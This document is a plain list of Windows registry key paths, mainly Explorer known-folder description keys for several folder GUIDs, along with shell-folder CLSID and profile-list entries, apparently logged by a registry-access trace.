HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1381398318-3211537236-2227685884-1000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1381398318-3211537236-2227685884-1000\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PropertyBag
HKEY_CLASSES_ROOT\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{59031A47-3F72-44A7-89C5-5595FE6B30EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2112AB0A-C86A-4FFE-A368-0DE96E47012E}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}\ParentFolder
